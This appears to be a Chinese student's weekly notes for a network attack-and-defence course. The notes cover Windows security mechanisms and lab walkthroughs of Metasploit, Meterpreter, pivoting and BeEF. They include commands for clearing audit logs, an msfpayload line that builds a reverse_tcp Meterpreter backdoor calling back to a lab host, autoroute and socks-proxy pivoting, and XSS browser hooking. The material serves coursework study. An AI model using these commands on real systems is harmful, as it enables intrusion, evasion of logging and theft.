• 20159315网络攻防实践第七周总结


    20159315网络攻防实践第七周总结#

    教材学习内容总结##

    1. Windows操作系统的基本结构:分为运行于处理器特权模式的操作系统内核,以及运行在处理器非特权模式的用户空间代码。采用宏内核模式来进行构架,这使得任意的内核模块或设备驱动程序都可能破坏其他内核模块数据,这种宏内核机制也使得Windows操作系统容易遭受以驱动方式植入内核的Rootkit的危害。Windows操作系统内核的基本模块包括如下:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。Windows操作系统在用户态的代码模块则包括如下:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
    2. Windows授权与访问控制机制:Windows的授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。在Windows服务器操作系统中,用户可以执行内建的whoami命令来查看当前用户的访问令牌信息。Windows对于系统中所有需保护的资源都抽象成对象,具体类型包括文件、目录、注册表键值、内核对象、同步对象、私有对象、管道、内存、通信接口等,而对每个对象会关联一个SD安全描述符,对象安全描述符由如下主要属性组成:Owner SID、Group SID、DACL自主访问控制列表、SACL系统审计访问控制列表。Windows安全审计机制:系统审计策略在本地安全策略中由系统管理员定义,来确定系统对那些事件进行记录。Windows的其他安全机制:身份认证、授权与访问控制以及安全审计是三个基本安全功能。保护Windows系统安全稳定运行最为关键的三项安全措施——防火墙、补丁自动更新以及病毒防护。除安全中心之外,Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等。
    3. Windows消踪灭迹:①关闭审计功能(Windows Resource Kit工具包里的auditpol程序可以让他们轻易地关闭审计功能)②清理事件日志(使用Event Viewer事件查看器来打开、读取和清除这台主机上的事件日志)

    视频学习内容##

    (27)Kali漏洞利用之Metasploit基础
    Metasploitable在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。
    一、启动服务
    在Kali中使用metaaploie,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据查询exploit和记录。

    service postgresql start service metasploit start
    如果不想每次开机都手工启动服务,可以配置随系统启动。
    update-rc.d postgresql enable
    update-rc.d metasploit enable
    二、路径介绍
    Kali中msf的路径为/usr/share/metasploit-framework
    Auxiliary:辅助模块,
    encoders:供msfencode编码工具使用,具体可以使用 msfencode –l

    exploits:攻击模块 每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录下。
    payloads:其中列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。
    post:后渗透阶段块,在获得meterpreter的shell之后可以使用攻击代码。比如常用的hashdump、arp_scanner就在这里。
    三、基本命令
    msfpayload:用来生成payload或者shellcode
    搜索的时候可以用msfpayload -l |grep "windows"这样的命令查询。-o 选项可以列出payload所需的参数。
    msfencode:
    msf中的编码器,早期为了编码绕过AV,现常用msfpayload与它编码避免exploit中的坏字符串。
    msfconsole:开启metasploit的concle
    四、测试示例:发现漏洞,搜索exploit

    前期扫描得知,目标21端口vsftpd服务版本为2.3.4,使用msfconsole打开msf的命令行版。
    找到匹配项

    选择相应功能

    设置远程ip地址,端口号用21

    攻击成功

    (28)Kali漏洞利用之Meterpreter介绍
    Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。
    Meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库组成,极大地丰富了攻击方式。其有很多有用的功能。
    常用命令:
    background:将当前会话放置后台
    load/use:加载模块
    Interact:切换一个信道
    migrate:迁移进程
    run:执行一个已有模块,输入run后按两下teb,会列出所有的已有脚本。
    Resource:执行一个已有的rc脚本常用的Meterpreter类型为:payload/windows/meterpreter/reverse_tcp
    针对windows操作系统,反向连接shell,只用起来比较稳定。
    一、生成Meterpreter后门
    命令:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.75.132 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe
    在指定目录,生成exe文件
    生成一个后门就要打开一个监听,接收返回的连接,查看需要的参数。需要两个参数LHOST,LPORT。

    将生成的文件模仿入侵的过程移动到靶机里。
    set LPORT 2333
    set LHOST 192.168.75.132
    exploit
    background返回到msf里

    screenshot桌面截图

    (29)Metasploit后渗透测试
    怎样设置跳板机?
    在跳板机获取一定权限后,需要积极地向内网主机权限发展,获取指定的目标信息,探查系统的漏洞,借助Msf已经得到的Meterpreter后门,可以使后续操作更容易。
    1、查看当前网卡、网段信息
    先控制一台跳板机,查看相关网卡网段信息
    2、添加路由表 run autoroute -s 10.0.0.1
    3、开Socks代理 通过使用 auxiliary/sever/socks4a模块,创建一个Socks代理,可以作为浏览器,Sqlmp,Namp等使用。
    4、通过Background和sessions -i可以自由切换进入Session
    5、输入run可以看到Meterpreter上可以做的很多命令
    6、获取内网信息run arp_scanner -r 10.0.0.1/24
    7、也可上传文件,做端口转发后续测试
    8、应用程序/权限维持/Tunnel工具集
    9、端口转发 upload lcx.exe c:

    (30)Kali漏洞利用之BeeF
    对XSS漏洞需要强大框架的支持,如网上的XSS平台。在Kali下,BeeF是一个不逊色于XSS平台的工具。Beef是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。官网http://beefproject.com/
    1、命令行下启动Beef beef-xss 此时浏览器自动访问此页面:http://127.0.0.1:3000/ui/authentication 使用默认用户名beef与默认密码beef登录:

    初始用户名和密码为:beef和beef

    左侧为目标的浏览器
    2、假设被测试主机由于XSS漏洞请求到 http://192.168.11.152:3000/demos/basic.html

    左侧online browsers出现新的选项,其Current Browser中包括浏览器名称、版本、操作系统版本等。
    3、HOOK持续的时间为关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令,在Commands模块,我们可以完成很多任务:

    其中,四种颜色分别表示:
    该攻击模块可用,但隐蔽性强
    该攻击模块可用,但隐蔽性差
    该用户模块是否可用还有待验证
    该攻击模块不可用
    

    选取MISC下Raw JavaScript模块作为测试用例

    执行,查看返回结果,成功则显示

    4、代理Proxy功能
    选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

    点击send 拿目标来请求页面

    状态还是waiting命令还在执行

  • 相关阅读:
    说一下 session 的工作原理?
    说一下 JSP 的 4 种作用域?
    MVC的各个部分都有那些技术来实现?如何实现?
    window.onload()函数和jQuery中的document.ready()有什么区别?
    JQuery有几种选择器?
    jQuery 库中的 $() 是什么?
    按照锁的粒度分数据库锁有哪些?锁机制与InnoDB锁算法?
    隔离级别与锁的关系?
    Java语言基础(二)之数据类型转换、运算符、方法入门
    Java语言基础(一)
  • 原文地址:https://www.cnblogs.com/xuzhili00/p/5402802.html
Copyright © 2020-2023  润新知